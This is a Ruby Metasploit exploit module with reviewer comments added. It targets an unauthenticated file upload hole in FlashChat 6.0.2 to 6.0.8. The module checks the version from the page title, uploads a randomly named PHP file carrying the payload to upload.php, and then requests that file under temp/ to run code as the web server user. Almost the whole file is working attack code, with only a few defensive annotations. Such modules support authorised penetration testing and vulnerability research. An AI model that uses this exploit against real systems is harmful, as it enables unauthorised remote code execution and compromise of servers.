Path: blob/master/modules/exploits/unix/webapp/flashchat_upload_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated PHP file upload in FlashChat (OSVDB 98233 / EDB 28709).
#
# Flow, as implemented below: a multipart POST to <TARGETURI>/upload.php drops
# a randomly named .php file, which is then requested at <TARGETURI>/temp/<name>.
# From a defender's point of view both requests show up in the web server
# access log, and the dropped file is registered for cleanup by FileDropper.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # NOTE(review): nothing in this file calls an EXE helper; the EXE mixin looks
  # like a carry-over from the module this was copied from — verify before
  # removing.
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and options. TARGETURI is the only user-supplied option and
  # is used as the base path for upload.php and temp/ in upload/exec below.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "FlashChat Arbitrary File Upload",
        'Description' => %q{
          This module exploits a file upload vulnerability found in FlashChat
          versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload
          feature in order to upload malicious PHP files without authentication
          which results in arbitrary remote code execution as the web server user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'x-hayben21', # Discovery and PoC
          'bcoles' # Metasploit
        ],
        'References' => [
          ['OSVDB', '98233'],
          ['EDB', '28709']
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'Arch' => ARCH_PHP,
        'Platform' => 'php',
        'Targets' => [
          # Tested on FlashChat version 6.0.8
          [ 'Generic (PHP Payload)', {} ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-10-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to FlashChat', '/chat/'])
      ]
    )
  end

  #
  # Checks if target is running FlashChat versions 6.0.2, 6.0.4 to 6.0.8
  #
  # The version is scraped from the <title> of the base page. Returns Unknown
  # when there is no response or no version string, Appears when the version
  # regex matches, Detected when the version string sorts at or below "6.0.8",
  # Safe otherwise.
  #
  # NOTE(review): the version regex is unanchored and the "<=" below is a
  # lexicographic String comparison, so e.g. "6.0.20" would match the regex
  # and "6.0.10" sorts before "6.0.8". Results for versions outside the
  # 6.0.x single-digit range should be treated as unreliable.
  #
  def check
    uri = normalize_uri(target_uri.path, '')
    res = send_request_raw({ 'uri' => uri })

    if not res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    # First capture of the title pattern, or '' when the page has no such title.
    version = res.body.scan(/<title>FlashChat v([\d\.]+)/).flatten[0] || ''

    if version.empty?
      return Exploit::CheckCode::Unknown
    end

    vprint_status("Version found: #{version}")

    if version =~ /6\.0\.(2|4|5|6|7|8)/
      return Exploit::CheckCode::Appears
    elsif version <= "6.0.8"
      # String comparison, not a version comparison (see note above).
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  #
  # Uploads our malicious file
  # Stolen from havalite_upload_exec.rb
  #
  # base - the TARGETURI path. Returns the random .php filename that was sent
  # in the multipart "file" part. Calls fail_with on no response, 404 or 500.
  #
  # NOTE(review): success is inferred from the absence of a 404/500 — any other
  # status (e.g. 403, or a 200 carrying an application error) falls through and
  # is reported as a successful upload; confirmation only comes from exec().
  #
  def upload(base)
    # 6..15 alphanumeric characters plus ".php" — nothing about the name is
    # predictable from the target, so the file cannot be found without the log.
    fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php"
    php = "<?php #{payload.encoded} ?>"
    data = Rex::MIME::Message.new
    data.add_part(php, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{fname}\"")
    post_data = data.to_s

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(base, 'upload.php'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    })

    if not res
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
    elsif res.code.to_i == 404
      fail_with(Failure::NotFound, "#{peer} - No upload.php found")
    elsif res.code.to_i == 500
      fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
    end

    return fname
  end

  #
  # Executes our uploaded malicious file
  # Stolen from havalite_upload_exec.rb
  #
  # base          - the TARGETURI path
  # payload_fname - the filename returned by upload()
  #
  # Requests <base>/temp/<payload_fname>. Only an explicit 404 is treated as
  # failure; a nil response (timeout) is accepted silently — presumably because
  # the payload may hold the connection open. Note that this compares
  # res.code == 404 directly, while upload() uses res.code.to_i; verify that
  # both forms behave the same for the HttpClient response type in use.
  #
  def exec(base, payload_fname)
    res = send_request_raw({
      'uri' => normalize_uri(base, 'temp', payload_fname)
    })

    if res and res.code == 404
      fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
    end
  end

  # Entry point: upload, register the dropped file for cleanup, then request it.
  #
  # NOTE(review): cleanup is registered with the bare filename although the
  # file is served from temp/ — whether that resolves to the same path depends
  # on the server-side working directory of the PHP session; not verifiable
  # from this file.
  def exploit
    base = target_uri.path

    # upload
    print_status("Uploading malicious file...")
    fname = upload(base)

    # register the file to clean
    register_files_for_cleanup(fname)

    # exec
    print_status("Executing #{fname}...")
    exec(base, fname)
  end
end